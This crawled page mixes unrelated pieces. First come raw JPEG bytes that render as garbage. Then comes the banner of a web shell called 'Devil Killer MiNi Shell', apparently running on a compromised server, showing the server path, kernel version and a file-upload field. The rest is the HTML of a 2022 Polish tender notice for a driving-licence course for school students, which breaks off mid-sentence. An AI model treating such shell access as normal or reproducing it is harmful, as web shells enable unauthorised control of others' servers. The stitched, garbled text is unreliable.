JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220330/0010300801-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zorganizowanie i przeprowadzenie kursu „Prawo jazdy kat.B wraz z egzaminem zewnętrznym” dla ZST w Mikołowie, ZSP w<br/>Ornontowicach oraz ZSEiU w Łaziskach Górnych, w ramach projektu EFS II </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Mikołowski reprezentowany przez Zarząd Powiatu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276255016</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Żwirki i Wigury 4a</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Mikołów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">43-190</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22C - Tyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@mikolowski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mikolowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zorganizowanie i przeprowadzenie kursu „Prawo jazdy kat.B wraz z egzaminem zewnętrznym” dla ZST w Mikołowie, ZSP w<br/>Ornontowicach oraz ZSEiU w Łaziskach Górnych, w ramach projektu EFS II </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-69679814-af3f-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00103008</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016167/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.6 Zorganizowanie i przeprowadzenie kursu zawodowego: Prawo jazdy kat. B wraz z egzaminem zewnętrznym w ramach projektu Efektywne Funkcjonalne Szkoły IIy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Projekt „Efektywne Funkcjonalne Szkoły II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego” współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego Województwa Śląskiego na lata 2014 – 2020.” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://e-zp.mikolowski.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://e-zp.mikolowski.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wpostępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami<br/>odbywasię przy użyciu systemu do elektronicznej obsługi zamówień Powiatu Mikołowskiego (zwanej<br/>dalej:„Systemem”) dostępnej pod adresem: https://e-zp.mikolowski.pl 2) Wykonawca zamierzający<br/>wziąćudział w postępowaniu o udzielenie zamówienia publicznego, musi posiadać konto w Systemie e-<br/>ZP.3) Rejestracja i korzystanie z Systemu E-ZP jest bezpłatne. 5) Dokonując rejestracji<br/>Wykonawcaakceptuje Regulamin korzystania z Systemu E-Zamówienia Publiczne Powiatu<br/>Mikołowskiego.6) WSystemie E-ZP znajdują się także instrukcja dla Wykonawcy (Instrukcja obsługi<br/>Systemu FINN e-Zamówienia Publiczne) oraz filmy instruktażowe - prezentujące podstawowe<br/>czynności dokonywaneprzez Wykonawców za pomocą Systemu (rejestracja, zadawanie pytań,<br/>złożenie oferty, wycofanieoferty). Instrukcja dostępna jest pod adresem: https://pomoc.e-zp.finn.pl/ 7)<br/>Specyfikacja połączenia,formatu przesyłanych danych oraz kodowania i oznaczania czasu odbioru<br/>danych Systemu E-ZP:a.Format kodowania treści w obrębie Systemu - UTF8,b. Komunikacja pomiędzy<br/>przeglądarkąWykonawcy, a serwerem jest wykonywana przy użyciu bezpiecznego protokołu<br/>HTTPS,c.Oznaczeniem czasu odbioru danych przez System jest data oraz dokładny czas (hh:mm:ss) -<br/>czaslokalny serwera synchronizowany odpowiednim źródłem czasu.8) Wymagania techniczne<br/>związane zkorzystaniem z Systemu (tj. informacje dotyczące specyfikacji połączenia, formatu<br/>przesyłanychdanych oraz kodowania i oznaczania czasu przekazania danych):a) stały dostęp do sieciInternet iminimalna prędkość<br/>połączenia internetowego nie mniejsza niż 512 kb/s;b)<br/>zaktualizowanaprzeglądarka internetowa Chrome w wersji 77 i późniejsze lub Mozilla Firefox w wersji<br/>63 ipóźniejsze;c) system operacyjny Microsoft Windows 7 i późniejsze lub Apple macOS 10.14<br/>ipóźniejsze, dystrybucje systemu Linux.9) Złożenie oferty w trybie podstawowym poprzez System e-<br/>ZPwymaga posiadania przez Wykonawcę kwalifikowanego podpisu elektronicznego lub<br/>podpisuosobistego lub podpisu zaufanego. 13) Pliki można podpisać przed dołączeniem do systemy<br/>zapomocą zewnętrznych narzędzi do podpisu lub po dołączeniu do Systemu e-ZP przy<br/>pomocykwalifikowanego podpisu elektronicznego lub podpisu osobistego lub podpisu<br/>zaufanego.14)Korzystanie z wbudowanej w System e-ZP funkcjonalności składania podpisu<br/>elektronicznego(kwalifikowany podpis elektroniczny, podpis osobisty, podpis zaufany) możliwe jest pod<br/>warunkiem, żesystem teleinformatyczny, z którego korzysta Wykonawca, wyposażony jest w jeden z<br/>poniższychkomponentów:• wirtualna maszyna Java firmy Oracle w wersji co najmniej 1.8.0_221 (Java<br/>SE JRE 8Update 221) z obsługą technologii Java Web Start (JavaWS) lub• wirtualna maszyna<br/>OpenJDK wwersji co najmniej 1.8.0_222 z zainstalowanym rozszerzeniem IcedTea Web Start.<br/>Powyższewymagania nie ograniczają możliwości korzystania przez Wykonawcę z<br/>zewnętrznegooprogramowania do składania podpisu elektronicznego,a) kwalifikowany podpis<br/>elektroniczny(dopuszczalne formaty podpisów: PaDES - format.pdf, XaDES - pozostałe formaty);b)<br/>podpiszaufany;c) podpis osobisty;16) Maksymalny rozmiar przesyłanych plików złożenia, wycofania:<br/>ofertyoraz wiadomości wynosi 150 MB;17. W zależności od formatu podpisu: Podpis kwalifikowany<br/>(PAdES,XAdES), podpis osobisty (XAdES), podpis zaufany (PAdES, XAdES) i jego typu<br/>(zewnętrzny,otaczający) Wykonawca dołącza do Systemu e-ZP uprzednio podpisane dokumenty wraz<br/>zwygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z podpisem (typ<br/>otaczający).18.Wykonawca składa ofertę za pośrednictwem funkcji „Wyślij” formularzy do złożenia,<br/>wycofania oferty .Wysłana oferta jest automatycznie szyfrowana i chroniona terminem otwarcia.19.<br/>Ofertę należy złożyćw oryginale przy użyciu dedykowanych funkcji Systemu.Pozostałe Zapisy w Sekcji<br/>IX Ogłoszenia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>a) administratorem Pani/Pana danych osobowych jest: Starosta Mikołowski z siedzibą : ul. Żwirki i Wigury 4a, 43-190 Mikołów , tel.<br/>(32) 32 – 48 – 102, faks (32) 32 – 48 – 211, e-mail: kancelaria@mikolowski.pl<br/>b) inspektorem ochrony danych osobowych jest Pan Sebastian Dziuban, adres poczty elektronicznej: iod@mikolow.starostwo.gov.pl;<br/>adres do korespondencji pisemnej jak w punkcie 1 litera „a”.<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego: nr MNZ.272.8.2022.BM, na: Zorganizowanie i przeprowadzenie kursu „Prawo jazdy kat.B wraz z<br/>egzaminem zewnętrznym” dla ZST w Mikołowie, ZSP w Ornontowicach oraz ZSEiU w Łaziskach Górnych, w ramach projektu<br/>„Efektywne Funkcjonalne Szkoły II - Program Rozwoju Szkół Zawodowych i Technicznych Powiatu Mikołowskiego”<br/>współfinansowanym ze środków Europejskiego Funduszu Społecznego w ramach Regionalnego Programu Operacyjnego<br/>Województwa Śląskiego na lata 2014 – 2020.” prowadzonym w trybie podstawowym bez negocjacji;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1 ustawy z dnia 11 września 2019 roku – Pzp ( tekst jednolity: Dz. U. z 2021 r. poz. 1129 z późn.<br/>zmianami), dalej „ustawa Pzp”;<br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy; zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej,<br/>jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (tj. Dz.U z 2011<br/>nr 14, poz. 67 z późn. zm.) teczki aktowe będą przechowywane w archiwum zakładowym przez okres 5 lat w przypadku<br/>dokumentacji zamówień publicznych oraz 10 lat w przypadku umów zawartych w wyniku postępowania w trybie zamówień<br/>publicznych;<br/>5) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>6)w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu sprecyzowanie<br/>żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego;<br/>− w przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie dużego wysiłku,<br/>Zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu<br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia publicznego.<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (przy czym korzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień<br/>umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników)<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO (przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>− wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO , nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia publicznego;<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, jeśli uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>8) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9) Jednocześnie Zamawiający przypomina o ciążącym na Wykonawcy obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które<br/>Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z<br/>wyłączeń, o których mowa w art. 14 ust. 5 RODO.<br/>10) Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art.<br/>16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie<br/>zamówienia publicznego w zakresie niezgodnym z ustawą Pzp.<br/>11) W postępowaniu o udzielenie zamówienia zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1<br/>RODO, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">MNZ.272.8.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1 Przedmiotem zamówienia jest: zorganizowanie i przeprowadzenie kursu zawodowego pn. „Prawo jazdy kat. B wraz z<br/>egzaminem zewnętrznym” dla 84 uczniów/uczennic.<br/>Kurs musi zostać przeprowadzony zgodnie z obowiązującymi przepisami prawa.<br/>Kurs zostanie przeprowadzony w formie stacjonarnej.<br/>Przedmiot zamówienia będzie się składał z:<br/>I. Przeprowadzenia kursu i egzaminu wewnętrznego na prawo jazdy kategorii ”B”, tj.:<br/>1 Zorganizowanie i przeprowadzenie kursu pn. „Prawo jazdy kategorii B” dla 84 uczniów w wymiarze 60 godzin.<br/>2 W szczególności kurs powinien obejmować przygotowanie teoretyczne – 30h na grupę i przy-gotowanie praktyczne – 30h<br/>na uczestnika oraz egzamin wewnętrzny z zakresu wymagań na prawo jazdy kategorii B, badania lekarskie każdego<br/>uczestnika.<br/>II. Przygotowania do egzaminu państwowego na prawo jazdy kategorii „B” do Wojewódzkiego Ośrodka Ruchu Drogowego<br/>1 Wniesienie stosownej opłaty za egzamin na „Prawo jazdy kategorii B” dla 84 uczniów (Wykonawca w całości pokrywa<br/>koszty egzaminów)<br/>Liczba uczestników ogółem – 84<br/>Liczba grup ogółem – 7<br/>Liczba osób w jednej grupie: minimum 10, maksimum 15<br/>Liczba godzin/grupę zajęcia teoretyczne – 30<br/>Liczba godzin/uczestnika zajęcia praktyczne – 30<br/>Liczba godzin ogółem: 210 h zajęć teoretycznych i 2520 h zajęć praktycznych<br/>Z czego:<br/>godzina zajęć teoretycznych = 45 min.<br/>godzina zajęć praktycznych = godzina zegarowa<br/>liczba osób szkolonych podczas zajęć praktycznych = 1 os.<br/>Zajęcia teoretyczne winny odbywać się z zastrzeżeniem §. 11 ROZPORZĄDZENIA MINISTRA INFRASTRUKTURY I<br/>BUDOWNICTWA 1 z dnia 4 marca 2016 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania<br/>pojazdami, instruktorów i wykładowców (tj. Dz.U.2018.1885)<br/>Zajęcia praktyczne winny odbywać się z zastrzeżeniem § 12 ROZPORZĄDZENIA MINISTRA INFRASTRUKTURY I<br/>BUDOWNICTWA 1 z dnia 4 marca 2016 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania<br/>pojazdami, instruktorów i wykładowców (tj. Dz.U.2018.1885)<br/>Termin realizacji: od daty podpisania umowy do 23.12.2022r.<br/>Kurs dla 84 uczestników/uczestniczek zostanie przeprowadzony dla 7 grup zajęciowych po 12 osób. Zamawiający<br/>dopuszcza możliwość zmiany liczby osób w grupie przy założeniu, że minimalna liczba osób w grupie wynosi 10, a<br/>maksymalna 15.<br/>III. Obowiązki wykonawcy:<br/>1. Zajęcia powinny się odbywać:<br/>• od poniedziałku do soboty (indywidualne zajęcia praktyczne tzw. „jazdy” możliwe również w niedzielę za zgodą ucznia),<br/>• dla uczniów szkół technicznych i zawodowych, dla których organem prowadzącym jest Powiat Mikołowski tj: Zespołu Szkół<br/>Technicznych w Mikołowie, Zespołu Szkół Energetycznych i Usługowych w Łaziskach Górnych, Zespołu Szkół<br/>Ponadpodstawowych w Ornontowicach,<br/>2. Zajęcia teoretyczne i praktyczne powinny odbywać się w promieniu 40 km (na podstawie danych GPS, trasa najkrótsza<br/>zmierzona przez samochód osobowy) od siedziby Zespołu Szkół Energetycznych i Usługowych w Łaziskach Górnych przy<br/>ul. Chopina 11b, w sali wykładowej zapewnionej przez Ośrodek Szkolenia Kierowców, spełniającej wymogi Rozporządzenia<br/>Ministra Infrastruktury i Budownictwa z dnia 4 marca 2016 r. w sprawie szkolenia osób ubiegających się o uprawnienia do<br/>kierowania pojazdami, instruktorów i wykładowców (Dz.U.2018.1885 t.j. z dnia 03.10.2018 r.), Rozdział 2, paragraf 3 ust. 1<br/>pkt. Dojazd na zajęcia teoretyczne z siedziby szkoły zapewnia Wykonawca. Na zajęcia praktyczne uczestnicy kursu<br/>umawiają się indywidualnie, samodzielnie dojeżdżając w wyznaczone miejsce.<br/>3. Wykonawca zobowiązuje się do uzgodnienia z kierownikiem projektu szczegółowego programu i harmonogramu zajęć dla<br/>Ogłoszenie nr 2022/BZP 00088184/01 z dnia 2022-03-16<br/>2022-03-16 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>poszczególnych grup w terminie 5 dni przed rozpoczęciem zajęć, natomiast ewentualnych korekt terminów zajęć nie później<br/>niż na 3 dni przed terminem zajęć danej grupy po uzyskaniu wcześniejszej akceptacji ze strony uczestników projektu.<br/>Harmonogram zajęć powinien być dostosowany do planu lekcji i harmonogramu zajęć dodatkowych w projekcie.<br/>4. Wykonawca posiada uprawnienia do prowadzenia działalności szkoleniowej i zapewni wykwalifikowaną kadrę do<br/>przeprowadzenia kursu.<br/>5. Podczas zajęć praktycznych z zakresu prowadzenia pojazdu, wymagane jest, aby jednocześnie odbywał jazdy wyłącznie<br/>jeden uczestnik szkolenia.<br/>6. Wykonawca powinien zapewnić uczestnikom kursu odpowiednie wyposażenie techniczne adekwatne do rodzaju kursu,<br/>odpowiadające indywidualnym potrzebom szkoleniowym uczestnika.<br/>Wykonawca jest zobowiązany zapewnić uczestnikom kursu w trakcie prowadzenia zajęć:<br/>• Samochód do nauki jazdy zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 31.12.2002r. w sprawie warunków<br/>technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (tj. Dz. U. z 2016r., poz.2022 ze zm.)<br/>• Pełnowymiarowy plac manewrowy,<br/>• Wykwalifikowaną kadrę instruktorską posiadającą uprawnienia do prowadzenia szkolenia na prawo jazdy kat. B,<br/>• Badania lekarskie uczestników kursu,<br/>• Wydanie świadectwa ukończenia kursu.<br/>7. Prawidłowość wykonania umowy zostanie potwierdzona poprzez prowadzenie dzienników 